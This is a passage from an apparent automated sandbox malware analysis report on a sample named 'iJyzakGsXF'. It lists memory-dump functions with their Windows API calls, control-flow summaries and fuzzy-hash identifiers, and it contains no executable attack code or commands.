                                                                                                                                      • Instruction ID: ab9e5ab55295217dea5d4ee23073eac4a4f339b9c557b9266b9e0b8bf359db8a
                                                                                                                                      • Opcode Fuzzy Hash: 5054ede1a2bf6436e56082cbecb2bf151e3e04c43aaa6dd5e55a4508c06a3daf
                                                                                                                                      • Instruction Fuzzy Hash: 8741CEB1C006598BDB24CFA9C944BCEBBB5BB49304F248069D409AB251D7B56985CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008BC2D1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1497 8bc2d1-8bc2d6 1498 8bc2d8-8bc36c DuplicateHandle 1497->1498 1499 8bc36e-8bc374 1498->1499 1500 8bc375-8bc392 1498->1500 1499->1500
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008BC35F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: a36c5923f42fdd328d3040e9f499ef8ccb5bd40424e300e26711b835141f38a6
                                                                                                                                      • Instruction ID: 8dccff3eaa8d71a7c57c614fddc0faf1dcb67aa84b2898a61365b37007e7012a
                                                                                                                                      • Opcode Fuzzy Hash: a36c5923f42fdd328d3040e9f499ef8ccb5bd40424e300e26711b835141f38a6
                                                                                                                                      • Instruction Fuzzy Hash: 0821B5B5D002199FDB10CFAAD984ADEBBF8FB58314F14855AE914A7310D378A944CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008BC2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1503 8bc2d8-8bc36c DuplicateHandle 1504 8bc36e-8bc374 1503->1504 1505 8bc375-8bc392 1503->1505 1504->1505
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008BC35F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 9952b72300dd69684b2b78e4c32aed1d92d56e665d2fb364d42e9960bc37c57e
                                                                                                                                      • Instruction ID: ebcb2b380f9fe4aabda837ccc062bfedce5ea6b0ed3d98b893b7c9c7a4952d65
                                                                                                                                      • Opcode Fuzzy Hash: 9952b72300dd69684b2b78e4c32aed1d92d56e665d2fb364d42e9960bc37c57e
                                                                                                                                      • Instruction Fuzzy Hash: 9421C4B5D002199FDB10CFAAD984ADEBFF8FB58324F14851AE914A3310D378A944CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008BA210 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1508 8ba210-8ba258 1510 8ba25a-8ba25d 1508->1510 1511 8ba260-8ba28f LoadLibraryExW 1508->1511 1510->1511 1512 8ba298-8ba2b5 1511->1512 1513 8ba291-8ba297 1511->1513 1513->1512
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BA071,00000800,00000000,00000000), ref: 008BA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 243444b8cfb1dd673b337eb2eed532788e5d766373b56d73fbf375ac5604773c
                                                                                                                                      • Instruction ID: 6d367444d082353c0e706bc15aba83bd40282b25ac63a68d66bb142e8933bc97
                                                                                                                                      • Opcode Fuzzy Hash: 243444b8cfb1dd673b337eb2eed532788e5d766373b56d73fbf375ac5604773c
                                                                                                                                      • Instruction Fuzzy Hash: 332103B6D002099FDB14CF9AC844ADEFBF8FB98310F14852AD419A7600C379A945CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008B9A98 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BA071,00000800,00000000,00000000), ref: 008BA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 7521c6770fae75d42fe043f96cec38ea1493175f270f1d41d6957590353bdce9
                                                                                                                                      • Instruction ID: 066577438b612f3e83f1ff34ca035a512866b7b622969f3f82f2990b05d5274e
                                                                                                                                      • Opcode Fuzzy Hash: 7521c6770fae75d42fe043f96cec38ea1493175f270f1d41d6957590353bdce9
                                                                                                                                      • Instruction Fuzzy Hash: 411100B6D002099FCB14CF9AD444ADEBBF8EB98324F14852AE419A7300C379A945CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E0A38 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetWindowLongW.USER32(?,?,?), ref: 023E0A9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LongWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                      • Opcode ID: 1f875a74afa6a304bd6cfa6ee85f3ac6c2b78fe0a9e489ec4d9e7170df04b58c
                                                                                                                                      • Instruction ID: 873afc86e5062fb22eaa3de1758d3e93bc9175ee8b6c557ee04bd07f775db974
                                                                                                                                      • Opcode Fuzzy Hash: 1f875a74afa6a304bd6cfa6ee85f3ac6c2b78fe0a9e489ec4d9e7170df04b58c
                                                                                                                                      • Instruction Fuzzy Hash: 6411F5B5900219DFDB10DF9AD584BDEBBF8EB48324F10855AD855B7340C374A944CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008B9F90 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 008B9FF6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: 632c45aa7e5d30a14ef37121efeebf7d3cfa4d897aec11ed5377d088ba54f05f
                                                                                                                                      • Instruction ID: 7f67f2966a43d03d2644ee3922621c3dcef6f7470a4a5ebaa547190021423c2f
                                                                                                                                      • Opcode Fuzzy Hash: 632c45aa7e5d30a14ef37121efeebf7d3cfa4d897aec11ed5377d088ba54f05f
                                                                                                                                      • Instruction Fuzzy Hash: 7C1102B5C006498FCB20CF9AC444ADEFBF8EB88324F10851AD459B7300C374A545CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E0A40 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetWindowLongW.USER32(?,?,?), ref: 023E0A9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LongWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                      • Opcode ID: d48b626ac2f68c5657d169c605427126d2bca89fb3d7d963bbaaaa95383140e5
                                                                                                                                      • Instruction ID: 727d1a5bce2dbd4c58748df51b2cb2ec756519374670ccf2b141cb37e1f45679
                                                                                                                                      • Opcode Fuzzy Hash: d48b626ac2f68c5657d169c605427126d2bca89fb3d7d963bbaaaa95383140e5
                                                                                                                                      • Instruction Fuzzy Hash: E811D3B59002199FDB10DF9AD584BDEBBF8EB48324F20855AD959B7340C374A944CFA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0070D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: abcdf8b314b107cec1557f547cd769601709be2aac493b5413ff0776fb5f6dda
                                                                                                                                      • Instruction ID: 83ac22771eb94a61db2cee82cb5376f5bf8c68667d82cb65e9d236064ff6ca5d
                                                                                                                                      • Opcode Fuzzy Hash: abcdf8b314b107cec1557f547cd769601709be2aac493b5413ff0776fb5f6dda
                                                                                                                                      • Instruction Fuzzy Hash: 5D21C471504340DFDB25DF54D9C0B26BFA5FB98318F248669EC051B286C33ADC65DAA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0071D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16caf6d2369fbab970833c165ff1de5db1d9d06e0a9fc8f5e661514750ace37a
                                                                                                                                      • Instruction ID: 20896bb8aa461508fc4dcd5713d3e9df0146533f977708c55c9759009e48c0c3
                                                                                                                                      • Opcode Fuzzy Hash: 16caf6d2369fbab970833c165ff1de5db1d9d06e0a9fc8f5e661514750ace37a
                                                                                                                                      • Instruction Fuzzy Hash: C2210471504240EFDB21DF18D9C0B66BBA5FB88324F24C66DE8094B282C33EDC86CE61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0071D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 761919dee7339141ac6d05f3c04d8730c84f9bd06d63f2c5a0fd6f2d83b879d6
                                                                                                                                      • Instruction ID: f1bba9d8725958c1ebe0b7185f684fc58960e72ec3a9741e2ace5dbff6650c30
                                                                                                                                      • Opcode Fuzzy Hash: 761919dee7339141ac6d05f3c04d8730c84f9bd06d63f2c5a0fd6f2d83b879d6
                                                                                                                                      • Instruction Fuzzy Hash: 5221F275604240DFDB24DF18D9C4B56BF65FB88314F24C569D80A4B286C37EDC86CEA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0070D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                                                                      • Instruction ID: cf3ebcaecb5ec30374dbe712e318e405a4ed12d3a26e7d8079ebfdcb8c68b3f4
                                                                                                                                      • Opcode Fuzzy Hash: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                                                                      • Instruction Fuzzy Hash: D011B176504280CFCB12CF54D9C4B16BFB2FB98324F24C6A9DC450B656C33AD96ACBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0071D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                                                                      • Instruction ID: de743a5671a96832e296f0116f1810456169550465b6ceeddb170237e11f4d2d
                                                                                                                                      • Opcode Fuzzy Hash: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                                                                      • Instruction Fuzzy Hash: 5411D075504280CFCB21CF18D5D4B55FB61FB48314F24C6ADD8494B696C33AD88ACF62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0071D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                                                                      • Instruction ID: 0f7a2b51fef8e7daa126c49414afa7902aafc8577abcea8ce3fbb1aca1c49b25
                                                                                                                                      • Opcode Fuzzy Hash: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                                                                      • Instruction Fuzzy Hash: F4118E75504280DFDB11CF14D5C4B55BBA1FB84324F24C6ADD8494B696C33AD85ACF51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0070D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 888923082c9c5e82084db3d57840ed754133b7c2043d27a5e029750fcd35044b
                                                                                                                                      • Instruction ID: 172d488066ba758fd7a3638eab4e64ffc4917ccfc40a5a0c1cc98ea83f1cbda5
                                                                                                                                      • Opcode Fuzzy Hash: 888923082c9c5e82084db3d57840ed754133b7c2043d27a5e029750fcd35044b
                                                                                                                                      • Instruction Fuzzy Hash: 0A01F771404380DAE7304B69CC84B66BFDCDF51334F18961AED055B286C27D9C40C6B1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0070D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 13e3da1b97567f44422aef19ceb069719bd8f5bf357497fdd3429dcbc542874c
                                                                                                                                      • Instruction ID: e6a94731e1c1f2012ec12260b17c4a729a4969afc942a611a307d7f34baf976f
                                                                                                                                      • Opcode Fuzzy Hash: 13e3da1b97567f44422aef19ceb069719bd8f5bf357497fdd3429dcbc542874c
                                                                                                                                      • Instruction Fuzzy Hash: CCF04F72404344AAE7208E5ACC88B62FBD8EB91734F18C55AED485B286C2799C44CAB1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%